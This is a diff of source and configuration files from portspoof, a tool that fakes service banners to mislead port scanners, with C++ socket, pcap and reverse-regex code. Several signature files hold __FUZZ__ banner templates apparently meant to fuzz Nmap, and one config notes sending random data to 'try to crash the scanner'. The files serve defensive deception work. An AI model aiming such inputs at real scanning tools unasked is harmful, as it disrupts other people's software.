ip_len = (ip->ip_hl & 0x0f) * 4;
|
||||
tcp = (struct tcphdr*)(packet + sizeof(struct ether_header) + ip_len);
|
||||
|
||||
ip_addr=(unsigned int) ip->ip_src.s_addr;
|
||||
|
||||
packetsmanager->addKnock(ip_addr,ntohs(tcp->th_dport),configuration);
|
||||
|
||||
|
||||
|
||||
}
|
||||
|
||||
int main(int argc, char** argv){
|
||||
|
||||
pcap_t *descr = NULL;
|
||||
char errbuf[PCAP_ERRBUF_SIZE];
|
||||
memset(errbuf,0,PCAP_ERRBUF_SIZE);
|
||||
struct bpf_program fp; /* The compiled filter */
|
||||
bpf_u_int32 mask; /* Our netmask */
|
||||
bpf_u_int32 net; /* Our IP */
|
||||
|
||||
configuration = new Configuration();
|
||||
|
||||
if(configuration->readConfigFile())
|
||||
exit(1);
|
||||
|
||||
if(configuration->processArgs(argc,argv))
|
||||
exit(1);
|
||||
|
||||
packetsmanager = new PacketsManager();
|
||||
cout<<"Device: "<<configuration->getDevice().c_str()<<endl;
|
||||
cout<<"Filter: "<<configuration->getFilter().c_str()<<endl;
|
||||
|
||||
|
||||
/* Find the properties for the device */
|
||||
if (pcap_lookupnet(configuration->getDevice().c_str(), &net, &mask, errbuf) == -1) {
|
||||
fprintf(stdout,"Couldn't get netmask for device %s: %s\n", configuration->getDevice().c_str(), errbuf);
|
||||
net = 0;
|
||||
mask = 0;
|
||||
}
|
||||
|
||||
//promisc mode.
|
||||
if ( (descr = pcap_open_live(configuration->getDevice().c_str(), BUFSIZ, 1, 512, errbuf)) == NULL){
|
||||
fprintf(stdout,"ERROR: %s\n", errbuf);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
cout<<"Promisc mode set"<<endl;
|
||||
|
||||
if (pcap_compile(descr, &fp, configuration->getFilter().c_str(), 0, net) == -1) {
|
||||
fprintf(stdout,"Couldn't parse filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
|
||||
exit(1);
|
||||
}
|
||||
if (pcap_setfilter(descr, &fp) == -1) {
|
||||
fprintf(stdout,"Couldn't install filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
cout<<"Listening..."<<endl;
|
||||
pcap_loop(descr,-1,packet_callback,NULL);
|
||||
return 0;
|
||||
}
|
4
src/src/nmapfuzzsignatures
Normal file
4
src/src/nmapfuzzsignatures
Normal file
@ -0,0 +1,4 @@
|
||||
550 4m2v4 (__FUZZ__)
|
||||
+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ__/xxx.\r\n
|
||||
220 __FUZZ__ ESMTP OpenSMTPD\r\n
|
||||
HTTP/1.0 200 OK\n<HTML><HEAD><TITLE>__FUZZ__'s desktop</TITLE></HEAD>\n<BODY>\n<APPLET CODE=vncviewer/VNCViewer.class ARCHIVE=vncviewer.jar WIDTH=44 HEIGHT=44>\n\t<param name=PORT value=4444>\n</APPLET>\n</BODY></HTML>\n
|
1
src/src/nmapfuzzsignatures2
Normal file
1
src/src/nmapfuzzsignatures2
Normal file
@ -0,0 +1 @@
|
||||
550 4m2v4 (__FUZZ__/,8085/open/tcp//smtp/dupa/)\r\n
|
4
src/src/nmapfuzzsignatures3
Normal file
4
src/src/nmapfuzzsignatures3
Normal file
@ -0,0 +1,4 @@
|
||||
550 4m2v4 __FUZZ__
|
||||
+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ__/xxx.\r\n
|
||||
220 __FUZZ__ ESMTP OpenSMTPD\r\n
|
||||
HTTP/1.0 200 OK\n<HTML><HEAD><TITLE>__FUZZ__'s desktop</TITLE></HEAD>\n<BODY>\n<APPLET CODE=vncviewer/VNCViewer.class ARCHIVE=vncviewer.jar WIDTH=44 HEIGHT=44>\n\t<param name=PORT value=4444>\n</APPLET>\n</BODY></HTML>\n
|
1
src/src/nmapfuzzsignatures4
Normal file
1
src/src/nmapfuzzsignatures4
Normal file
@ -0,0 +1 @@
|
||||
550 4m2v4 __FUZZ__
|
1
src/src/nmapfuzzsignatures_acu
Normal file
1
src/src/nmapfuzzsignatures_acu
Normal file
@ -0,0 +1 @@
|
||||
HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\n<title>Log In - Juniper Web Device Manager</title><address>Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80</address>
|
4
src/src/nmapfuzzsignatures_http
Normal file
4
src/src/nmapfuzzsignatures_http
Normal file
@ -0,0 +1,4 @@
|
||||
550 4m2v4 (__FUZZ__)
|
||||
+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ__/xxx.\r\n
|
||||
220 __FUZZ__ ESMTP OpenSMTPD\r\n
|
||||
HTTP/1.0 200 OK\n<HTML><HEAD><TITLE>__FUZZ__'s desktop</TITLE></HEAD>\n<BODY>\n<APPLET CODE=vncviewer/VNCViewer.class ARCHIVE=vncviewer.jar WIDTH=44 HEIGHT=44>\n\t<param name=PORT value=4444>\n</APPLET>\n</BODY></HTML>\n
|
1
src/src/nmapfuzzsignatures_nessus
Normal file
1
src/src/nmapfuzzsignatures_nessus
Normal file
@ -0,0 +1 @@
|
||||
220 __FUZZ__ SMTP ready to roll\r\n
|
0
src/src/out.txt
Normal file
0
src/src/out.txt
Normal file
BIN
src/src/portspoof
Executable file
BIN
src/src/portspoof
Executable file
Binary file not shown.
53
src/src/portspoof.conf
Normal file
53
src/src/portspoof.conf
Normal file
@ -0,0 +1,53 @@
|
||||
#This is an example signature mapping configuration file
|
||||
|
||||
#Send custom payload (this can be a simple string)
|
||||
1 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
||||
2 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
||||
3 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
||||
4 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
||||
5 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
||||
6 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00"
|
||||
7 "550 12345 0fffffffffffff777778887777777777cffffffffffffffffffff00"
|
||||
8 "550 12345 0fffffffffff8000000000000000008888887cfcfffffffffffff00"
|
||||
9 "550 12345 0ffffffffff80000088808000000888800000008887ffffffffff00"
|
||||
10 "550 12345 0fffffffff70000088800888800088888800008800007ffffffff00"
|
||||
11 "550 12345 0fffffffff000088808880000000000000088800000008fffffff00"
|
||||
12 "550 12345 0ffffffff80008808880000000880000008880088800008ffffff00"
|
||||
13 "550 12345 0ffffffff000000888000000000800000080000008800007fffff00"
|
||||
14 "550 12345 0fffffff8000000000008888000000000080000000000007fffff00"
|
||||
15 "550 12345 0ffffff70000000008cffffffc0000000080000000000008fffff00"
|
||||
16 "550 12345 0ffffff8000000008ffffff007f8000000007cf7c80000007ffff00"
|
||||
17 "550 12345 0fffff7880000780f7cffff7800f8000008fffffff80808807fff00"
|
||||
18 "550 12345 0fff78000878000077800887fc8f80007fffc7778800000880cff00"
|
||||
19 "550 12345 0ff70008fc77f7000000f80008f8000007f0000000000000888ff00"
|
||||
20 "550 12345 0ff0008f00008ffc787f70000000000008f000000087fff8088cf00"
|
||||
21 "550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00"
|
||||
22 "550 12345 0f8008c008fff8000000000000780000007f800087708000800ff00"
|
||||
23 "550 12345 0f8008707ff07ff8000008088ff800000000f7000000f800808ff00"
|
||||
24 "550 12345 0f7000f888f8007ff7800000770877800000cf780000ff00807ff00"
|
||||
25 "550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00"
|
||||
26 "550 12345 0ff70800008ff800f007fff70880000087f70000007fcf7007fff00"
|
||||
27 "550 12345 0fff70000007fffcf700008ffc778000078000087ff87f700ffff00"
|
||||
28 "550 12345 0ffffc000000f80fff700007787cfffc7787fffff0788f708ffff00"
|
||||
29 "550 12345 0fffff7000008f00fffff78f800008f887ff880770778f708ffff00"
|
||||
30 "550 12345 0ffffff8000007f0780cffff700000c000870008f07fff707ffff00"
|
||||
31 "550 12345 0ffffcf7000000cfc00008fffff777f7777f777fffffff707ffff00"
|
||||
32 "550 12345 0cccccff0000000ff000008c8cffffffffffffffffffff807ffff00"
|
||||
33 "550 12345 0fffffff70000000ff8000c700087fffffffffffffffcf808ffff00"
|
||||
34 "550 12345 0ffffffff800000007f708f000000c0888ff78f78f777c008ffff00"
|
||||
35 "550 12345 0fffffffff800000008fff7000008f0000f808f0870cf7008ffff00"
|
||||
36 "550 12345 0ffffffffff7088808008fff80008f0008c00770f78ff0008ffff00"
|
||||
37 "550 12345 0fffffffffffc8088888008cffffff7887f87ffffff800000ffff00"
|
||||
38 "550 12345 0fffffffffffff7088888800008777ccf77fc777800000000ffff00"
|
||||
39 "550 12345 0fffffffffffffff800888880000000000000000000800800cfff00"
|
||||
40 "550 12345 0fffffffffffffffff70008878800000000000008878008007fff00"
|
||||
41 "550 12345 0fffffffffffffffffff700008888800000000088000080007fff00"
|
||||
42 "550 12345 0fffffffffffffffffffffc800000000000000000088800007fff00"
|
||||
43 "550 12345 0fffffffffffffffffffffff7800000000000008888000008ffff00"
|
||||
44 "550 12345 0fffffffffffffffffffffffff7878000000000000000000cffff00"
|
||||
45 "550 12345 0ffffffffffffffffffffffffffffffc880000000000008ffffff00"
|
||||
46 "550 12345 0ffffffffffffffffffffffffffffffffff7788888887ffffffff00"
|
||||
47 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00"
|
||||
48 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
||||
49 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
||||
50 "550 12345 0000000000000000000000000000000000000000000000000000000"
|
227
src/src/portspoof.cpp
Normal file
227
src/src/portspoof.cpp
Normal file
@ -0,0 +1,227 @@
|
||||
/*
|
||||
* portspoof Service signature obfucastor
|
||||
* Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
|
||||
*
|
||||
* This program is free software; you can redistribute it and/or modify it
|
||||
* under the terms of the GNU General Public License as published by the
|
||||
* Free Software Foundation; either version 2 of the License, or (at your
|
||||
* option) any later version.
|
||||
*
|
||||
* This program is distributed in the hope that it will be useful,
|
||||
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
* See the GNU General Public License for more details.
|
||||
*
|
||||
* You should have received a copy of the GNU General Public License along
|
||||
* with this program; if not, see <http://www.gnu.org/licenses>.
|
||||
*
|
||||
* Linking portspoof statically or dynamically with other modules is making
|
||||
* a combined work based on portspoof. Thus, the terms and conditions of
|
||||
* the GNU General Public License cover the whole combination.
|
||||
*
|
||||
* In addition, as a special exception, the copyright holder of portspoof
|
||||
* gives you permission to combine portspoof with free software programs or
|
||||
* libraries that are released under the GNU LGPL. You may copy
|
||||
* and distribute such a system following the terms of the GNU GPL for
|
||||
* portspoof and the licenses of the other code concerned.
|
||||
*
|
||||
* Note that people who make modified versions of portspoof are not obligated
|
||||
* to grant this special exception for their modified versions; it is their
|
||||
* choice whether to do so. The GNU General Public License gives permission
|
||||
* to release a modified version without this exception; this exception
|
||||
* also makes it possible to release a modified version which carries
|
||||
* forward this exception.
|
||||
*/
|
||||
|
||||
|
||||
#include <sys/types.h>
|
||||
#include <pthread.h>
|
||||
#include <sys/timeb.h>
|
||||
#include <sys/wait.h>
|
||||
#include <err.h>
|
||||
#include <errno.h>
|
||||
#include <fcntl.h>
|
||||
#include <limits.h>
|
||||
#include <netdb.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <signal.h>
|
||||
|
||||
#include "revregex.h"
|
||||
#include "threads.h"
|
||||
#include "connection.h"
|
||||
#include "log.h"
|
||||
|
||||
Configuration* configuration;
|
||||
|
||||
pthread_cond_t new_connection_cond = PTHREAD_COND_INITIALIZER;
|
||||
pthread_mutex_t new_connection_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
|
||||
|
||||
int choose_thread()
|
||||
{
|
||||
int i=MAX_THREADS-1;
|
||||
int min = i;
|
||||
while(i >=0)
|
||||
{
|
||||
if(threads[i].client_count < threads[min].client_count)
|
||||
{
|
||||
min = i;
|
||||
}
|
||||
i--;
|
||||
}
|
||||
|
||||
if(threads[min].client_count==MAX_CLIENT_PER_THREAD)
|
||||
return -1;
|
||||
|
||||
return min;
|
||||
}
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
|
||||
int sockd,newsockfd;
|
||||
int addrlen;
|
||||
//int pid;
|
||||
struct sockaddr_in my_name, peer_name;
|
||||
int status;
|
||||
|
||||
|
||||
configuration = new Configuration();
|
||||
|
||||
if(configuration->processArgs(argc,argv))
|
||||
exit(1);
|
||||
|
||||
if(configuration->processSignatureFile())
|
||||
exit(1);
|
||||
|
||||
if(configuration->readConfigFile())
|
||||
exit(1);
|
||||
|
||||
/*
|
||||
if(configuration->getConfigValue(OPT_FUZZ_NMAP))
|
||||
{
|
||||
if(configuration->PrepareFuzzer())
|
||||
{
|
||||
fprintf(stdout,"Fuzzer prepare failed!\n");
|
||||
fflush(stdout);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
fprintf(stdout,"-> Preparing fuzzer!\n");
|
||||
|
||||
}
|
||||
*/
|
||||
|
||||
|
||||
//check log file
|
||||
if(configuration->getConfigValue(OPT_LOG_FILE))
|
||||
log_create(configuration->getLogFile().c_str());
|
||||
|
||||
// open file
|
||||
if(configuration->getConfigValue(OPT_SIG_FILE))
|
||||
fprintf(stdout,"-> Using user defined signature file %s\n",configuration->getSignatureFile().c_str());
|
||||
fflush(stdout);
|
||||
|
||||
/* create thread pool */
|
||||
for(int i = 0; i < MAX_THREADS; i++)
|
||||
{
|
||||
pthread_create(&threads[i].tid, NULL, &process_connection, (void *) i);
|
||||
threads[i].client_count = 0;
|
||||
}
|
||||
|
||||
/* create a socket */
|
||||
sockd = socket(PF_INET, SOCK_STREAM, 0);
|
||||
if (sockd == -1)
|
||||
{
|
||||
perror("Socket creation error");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
int n = 1;
|
||||
setsockopt(sockd, SOL_SOCKET, SO_REUSEADDR , &n, sizeof(n));
|
||||
|
||||
/* server address - by default localhost */
|
||||
my_name.sin_family = PF_INET;
|
||||
if(configuration->getConfigValue(OPT_IP))
|
||||
{
|
||||
fprintf(stdout,"-> Binding to iface: %s\n",configuration->getBindIP().c_str());
|
||||
inet_aton(configuration->getBindIP().c_str(), &my_name.sin_addr);
|
||||
|
||||
}
|
||||
else
|
||||
my_name.sin_addr.s_addr = INADDR_ANY;
|
||||
|
||||
if(configuration->getConfigValue(OPT_PORT))
|
||||
{
|
||||
fprintf(stdout,"-> Binding to port: %d\n",configuration->getPort());
|
||||
my_name.sin_port = htons(configuration->getPort());
|
||||
|
||||
}
|
||||
else
|
||||
my_name.sin_port = htons(DEFAULT_PORT);
|
||||
|
||||
status = bind(sockd, (struct sockaddr*)&my_name, sizeof(my_name));
|
||||
if (status == -1)
|
||||
{
|
||||
perror("Binding error");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Set queue sizeof
|
||||
status = listen(sockd, 10);
|
||||
if (status == -1)
|
||||
{
|
||||
perror("Listen set error");
|
||||
exit(1);
|
||||
}
|
||||
int choosen;
|
||||
while(1)
|
||||
{
|
||||
/* wait for a connection */
|
||||
addrlen = sizeof(peer_name);
|
||||
newsockfd = accept(sockd, (struct sockaddr*)&peer_name,(socklen_t*) &addrlen);
|
||||
|
||||
|
||||
if (newsockfd < 0)
|
||||
perror("ERROR on accept");
|
||||
else{
|
||||
|
||||
nonblock(newsockfd);
|
||||
|
||||
start:
|
||||
pthread_mutex_lock(&new_connection_mutex);
|
||||
choosen=choose_thread();
|
||||
|
||||
|
||||
if( choosen == -1)
|
||||
{
|
||||
pthread_mutex_unlock(&new_connection_mutex);
|
||||
sleep(1);
|
||||
goto start;
|
||||
}
|
||||
|
||||
|
||||
if(configuration->getConfigValue(OPT_DEBUG))
|
||||
fprintf(stdout," new conn - thread choosen: %d - nr. of connections already in queue: %d\n",choosen,threads[choosen].client_count);
|
||||
fflush(stdout);
|
||||
|
||||
for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++)
|
||||
{
|
||||
if(threads[choosen].clients[i] == 0)
|
||||
{
|
||||
threads[choosen].clients[i] = newsockfd;
|
||||
threads[choosen].client_count++;
|
||||
break;
|
||||
}
|
||||
}
|
||||
pthread_mutex_unlock(&new_connection_mutex);
|
||||
}
|
||||
|
||||
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
35
src/src/portspoof.h
Normal file
35
src/src/portspoof.h
Normal file
@ -0,0 +1,35 @@
|
||||
/*
|
||||
* portspoof Service signature obfucastor
|
||||
* Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
|
||||
*
|
||||
* This program is free software; you can redistribute it and/or modify it
|
||||
* under the terms of the GNU General Public License as published by the
|
||||
* Free Software Foundation; either version 2 of the License, or (at your
|
||||
* option) any later version.
|
||||
*
|
||||
* This program is distributed in the hope that it will be useful,
|
||||
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
* See the GNU General Public License for more details.
|
||||
*
|
||||
* You should have received a copy of the GNU General Public License along
|
||||
* with this program; if not, see <http://www.gnu.org/licenses>.
|
||||
*
|
||||
* Linking portspoof statically or dynamically with other modules is making
|
||||
* a combined work based on portspoof. Thus, the terms and conditions of
|
||||
* the GNU General Public License cover the whole combination.
|
||||
*
|
||||
* In addition, as a special exception, the copyright holder of portspoof
|
||||
* gives you permission to combine portspoof with free software programs or
|
||||
* libraries that are released under the GNU LGPL. You may copy
|
||||
* and distribute such a system following the terms of the GNU GPL for
|
||||
* portspoof and the licenses of the other code concerned.
|
||||
*
|
||||
* Note that people who make modified versions of portspoof are not obligated
|
||||
* to grant this special exception for their modified versions; it is their
|
||||
* choice whether to do so. The GNU General Public License gives permission
|
||||
* to release a modified version without this exception; this exception
|
||||
* also makes it possible to release a modified version which carries
|
||||
* forward this exception.
|
||||
*/
|
||||
|
8
src/src/portspoof2.conf
Normal file
8
src/src/portspoof2.conf
Normal file
@ -0,0 +1,8 @@
|
||||
#TODO
|
||||
#Send message to Nmap scanners (will be visible as an extracted Banner )
|
||||
9000 NMAP:"What are you looking for?"
|
||||
|
||||
#Send random data on port 3000 (try to crash the scanner)
|
||||
#3000 random
|
||||
#Send random data on port 3001-3010 (try to crash the scanner)
|
||||
#3001-3010 random
|
663
src/src/revregex.cpp
Normal file
663
src/src/revregex.cpp
Normal file
@ -0,0 +1,663 @@
|
||||
/*
|
||||
* portspoof Service signature obfucastor
|
||||
* Copyright (C) 12012 Piotr Duszyński <piotr[at]duszynski.eu>
|
||||
*
|
||||
* This program is free software; you can redistribute it and/or modify it
|
||||
* under the terms of the GNU General Public License as published by the
|
||||
* Free Software Foundation; either version 2 of the License, or (at your
|
||||
* option) any later version.
|
||||
*
|
||||
* This program is distributed in the hope that it will be useful,
|
||||
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
* See the GNU General Public License for more details.
|
||||
*
|
||||
* You should have received a copy of the GNU General Public License along
|
||||
* with this program; if not, see <http://www.gnu.org/licenses>.
|
||||
*
|
||||
* Linking portspoof statically or dynamically with other modules is making
|
||||
* a combined work based on portspoof. Thus, the terms and conditions of
|
||||
* the GNU General Public License cover the whole combination.
|
||||
*
|
||||
* In addition, as a special exception, the copyright holder of portspoof
|
||||
* gives you permission to combine portspoof with free software programs or
|
||||
* libraries that are released under the GNU LGPL. You may copy
|
||||
* and distribute such a system following the terms of the GNU GPL for
|
||||
* portspoof and the licenses of the other code concerned.
|
||||
*
|
||||
* Note that people who make modified versions of portspoof are not obligated
|
||||
* to grant this special exception for their modified versions; it is their
|
||||
* choice whether to do so. The GNU General Public License gives permission
|
||||
* to release a modified version without this exception; this exception
|
||||
* also makes it possible to release a modified version which carries
|
||||
* forward this exception.
|
||||
*/
|
||||
|
||||
#include "revregex.h"
|
||||
|
||||
int signatures[SIGNATURES_SIZE];
|
||||
int num_signatures=30;
|
||||
struct signature **arr_lines2;
|
||||
|
||||
char * revregex_bracket(char * str,int start_offset,int end_offset, int* retlen) //index: '[' ... ']'
|
||||
{
|
||||
//TODO hex support
|
||||
int bslash='\\';
|
||||
int word='w';
|
||||
int digit='d';
|
||||
int range='-';
|
||||
|
||||
//flags
|
||||
char nnot=0;
|
||||
char wordf=0;
|
||||
char digitf=0;
|
||||
char rangeword=0;
|
||||
char rangedigit=0;
|
||||
|
||||
//character pool
|
||||
char characters[255]={0,};
|
||||
int chari=0;
|
||||
char characterstmp[255]={0,};
|
||||
long character_class=0;
|
||||
|
||||
//skip first bracket char
|
||||
int i=start_offset+1;
|
||||
int lend_offset=end_offset;
|
||||
int tmpj;
|
||||
|
||||
if( str[i]=='^') //not flag
|
||||
{
|
||||
i++;nnot=1;
|
||||
}
|
||||
|
||||
// DEBUG
|
||||
//fprintf(stdout,"%d %d",i,end_offset);
|
||||
|
||||
for(i;i<lend_offset;i++)
|
||||
{
|
||||
|
||||
if( str[i]==bslash && i+1!=lend_offset ) //special chars - check if character class
|
||||
{
|
||||
if(str[i+1]=='c')
|
||||
character_class|=1<<1;
|
||||
else if(str[i+1]=='s')
|
||||
character_class|=2<<1;
|
||||
else if(str[i+1]=='S')
|
||||
character_class|=1<<3;
|
||||
else if(str[i+1]=='d')
|
||||
character_class|=1<<4;
|
||||
else if(str[i+1]=='D')
|
||||
character_class|=1<<5;
|
||||
else if(str[i+1]=='w')
|
||||
character_class|=1<<6;
|
||||
else if(str[i+1]=='W')
|
||||
character_class|=1<<7;
|
||||
else if(str[i+1]=='n')
|
||||
characters['\n']=1;
|
||||
else if(str[i+1]=='r')
|
||||
characters['\r']=1;
|
||||
else if(str[i+1]=='t')
|
||||
characters['\t']=1;
|
||||
else if(str[i+1]=='v')
|
||||
characters['\v']=1;
|
||||
else if(str[i+1]=='f')
|
||||
characters['\f']=1;
|
||||
else if(str[i+1]=='0')
|
||||
characters['\0']=1;
|
||||
else
|
||||
{
|
||||
//DEBUG
|
||||
//fprintf(stdout,"unknown char: %c !\n", str[i+1]); //DEBUG - ignore this char it probably was escaped
|
||||
characters[str[i+1]]=1;
|
||||
}
|
||||
i++;
|
||||
|
||||
}
|
||||
else if( isalpha(str[i]) && (i+1)!=lend_offset && str[i+1]==range && (i+2)!=lend_offset && isalpha(str[i+2])) //check if rangeword
|
||||
{
|
||||
//DEBUG
|
||||
//fprintf(stdout,"rangew");
|
||||
|
||||
//add chars from range to the pool
|
||||
tmpj=str[i];
|
||||
for(tmpj;tmpj<=str[i+2];tmpj++)
|
||||
{
|
||||
characters[tmpj]=1;
|
||||
}
|
||||
i+=3;
|
||||
rangeword=1;
|
||||
|
||||
}
|
||||
else if( isdigit(str[i]) && (i+1)!=lend_offset && str[i+1]==range && (i+2)!=lend_offset && isdigit(str[i+2])) //check if rangedigit
|
||||
{
|
||||
//DEBUG
|
||||
//fprintf(stdout,"ranged");
|
||||
|
||||
tmpj=str[i];
|
||||
for(tmpj;tmpj<=str[i+2];tmpj++)
|
||||
{
|
||||
characters[tmpj]=1;
|
||||
}
|
||||
i+=3;
|
||||
rangedigit=1;
|
||||
|
||||
}
|
||||
else if(str[i]=='.')
|
||||
character_class|=1<<8;
|
||||
else if(str[i]=='|') //TODO: implement this
|
||||
character_class|=1<<9;
|
||||
else
|
||||
{
|
||||
//printf ("# [ char %c ]\n",str[i]);
|
||||
characters[str[i]]=1;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
char endmetachar=str[end_offset+1]; //TODO: should be ok unless one creates "[a-z]", which is invalid regex!
|
||||
int finsize=0;
|
||||
//srand (time(NULL) );
|
||||
|
||||
// fill character pool
|
||||
if(character_class & 1<<1)
|
||||
{
|
||||
|
||||
}
|
||||
else if(character_class & 1<<2)
|
||||
{
|
||||
|
||||
}
|
||||
else if(character_class & 1<<3)
|
||||
{
|
||||
|
||||
}
|
||||
else if(character_class & 1<<4)
|
||||
{
|
||||
int j='0';
|
||||
for(j;j<='9';j++)
|
||||
{
|
||||
characters[j]=1;
|
||||
}
|
||||
|
||||
}
|
||||
else if(character_class & 1<<5)
|
||||
{
|
||||
|
||||
|
||||
|
||||
}
|
||||
else if(character_class & 1<<6)
|
||||
{
|
||||
int j='a';
|
||||
for(j;j<='z';j++)
|
||||
{
|
||||
characters[j]=1;
|
||||
}
|
||||
|
||||
j='A';
|
||||
for(j;j<='Z';j++)
|
||||
{
|
||||
characters[j]=1;
|
||||
}
|
||||
|
||||
}
|
||||
else if(character_class & 1<<7)
|
||||
{
|
||||
|
||||
}
|
||||
else if(character_class & 1<<8)
|
||||
{
|
||||
/*
|
||||
int j=0;
|
||||
for(j;j<255;j++)
|
||||
{
|
||||
characters[j]=1;
|
||||
}
|
||||
|
||||
characters['\n']=0;
|
||||
*/
|
||||
}
|
||||
else if(character_class & 1<<9)
|
||||
{
|
||||
|
||||
}
|
||||
|
||||
|
||||
// simple support - TODO to extend
|
||||
if(endmetachar=='*')
|
||||
finsize=rand()%10;
|
||||
else if(endmetachar =='+')
|
||||
finsize=1+rand()%9;
|
||||
|
||||
// DEBUG f
|
||||
//fprintf(stdout,"\n###\n");
|
||||
|
||||
|
||||
//TODO to be corrected
|
||||
i=0;
|
||||
for(i;i<255;i++)
|
||||
{
|
||||
if(nnot==0 && characters[i])
|
||||
{
|
||||
characterstmp[chari]=i;
|
||||
chari++;
|
||||
//fprintf(stdout,"%c",i);
|
||||
}
|
||||
else if(nnot && characters[i]==0)
|
||||
{
|
||||
characterstmp[chari]=i;
|
||||
chari++;
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
char *finstr=(char*)malloc((finsize+1)*sizeof(char));
|
||||
memset(finstr,0,(finsize+1)*sizeof(char));
|
||||
|
||||
if(chari)
|
||||
{
|
||||
int tmp;
|
||||
i=0;
|
||||
for(i;i<finsize;i++)
|
||||
{
|
||||
tmp=rand()%chari;
|
||||
finstr[i]=characterstmp[tmp];
|
||||
}
|
||||
}
|
||||
|
||||
*retlen=finsize;
|
||||
return finstr;
|
||||
}
|
||||
|
||||
char * fill_specialchars(char * str,int* param_len, int start_offset,int end_offset)
|
||||
{
|
||||
|
||||
int bslash='\\';
|
||||
int word='w';
|
||||
int digit='d';
|
||||
int dot='.';
|
||||
int newline='n';
|
||||
int creturn='r';
|
||||
int tab='t';
|
||||
|
||||
|
||||
char* tmp; // tmp string for merging
|
||||
int tmplen=end_offset-start_offset;
|
||||
int tmpi=0;
|
||||
|
||||
|
||||
if (!(tmp = (char*)malloc(tmplen * sizeof(char))))
|
||||
exit(1);
|
||||
memset(tmp,0,tmplen);
|
||||
|
||||
|
||||
int i=start_offset;
|
||||
|
||||
for(i;i<end_offset;i++)
|
||||
{
|
||||
if(str[i]==bslash && i+1!=end_offset && str[i+1]==word )
|
||||
{
|
||||
tmp[tmpi]=97+rand()%25;
|
||||
tmpi++;
|
||||
i++;
|
||||
|
||||
if(i+1!=end_offset && (str[i+1]=='+' ||str[i+1]=='*') )
|
||||
i++;
|
||||
|
||||
}
|
||||
else if(str[i]==bslash && i+1!=end_offset && str[i+1]==digit )
|
||||
{
|
||||
tmp[tmpi]=48+rand()%10;
|
||||
tmpi++;
|
||||
i++;
|
||||
|
||||
if(i+1!=end_offset && (str[i+1]=='+' ||str[i+1]=='*') )
|
||||
i++;
|
||||
|
||||
}
|
||||
else if(str[i]==bslash && i+1!=end_offset && str[i+1]==newline )
|
||||
{
|
||||
tmp[tmpi]='\n';
|
||||
tmpi++;
|
||||
i++;
|
||||
}
|
||||
else if(str[i]==bslash && i+1!=end_offset && str[i+1]==creturn )
|
||||
{
|
||||
tmp[tmpi]='\r';
|
||||
tmpi++;
|
||||
i++;
|
||||
}
|
||||
else if(str[i]==bslash && i+1!=end_offset && str[i+1]==tab )
|
||||
{
|
||||
tmp[tmpi]='\t';
|
||||
tmpi++;
|
||||
i++;
|
||||
}
|
||||
else if(str[i]==dot && i!=start_offset && str[i-1]!=bslash)
|
||||
{
|
||||
|
||||
tmp[tmpi]=97+rand()%25;
|
||||
tmpi++;
|
||||
}
|
||||
else
|
||||
{
|
||||
tmp[tmpi]=str[i];
|
||||
tmpi++;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
char* fin;
|
||||
int finlen=tmpi+1;
|
||||
|
||||
if (!(fin = (char*)malloc(finlen * sizeof(char))))
|
||||
exit(1);
|
||||
|
||||
memset(fin,0,finlen);
|
||||
memcpy(fin,tmp,finlen-1);
|
||||
*param_len=finlen-1;
|
||||
|
||||
return fin;
|
||||
}
|
||||
|
||||
char* revregex(char * param_str,int* param_len,int start_offset,int end_offset) // with brackets
|
||||
{
|
||||
int lnaw='(';
|
||||
int rnaw=')';
|
||||
int lbrak='[';
|
||||
int rbrak=']';
|
||||
int bslash='\\';
|
||||
|
||||
|
||||
char* str; //main string
|
||||
int str_len=*param_len;
|
||||
int str_end_offset=end_offset;
|
||||
|
||||
char* tmp; // tmp string for merging
|
||||
int tmplen;
|
||||
|
||||
if (!(str = (char*)malloc((str_len+1) * sizeof(char))))
|
||||
exit(1);
|
||||
memset(str,0,str_len+1);
|
||||
memcpy(str,param_str+start_offset,str_len);
|
||||
|
||||
// start
|
||||
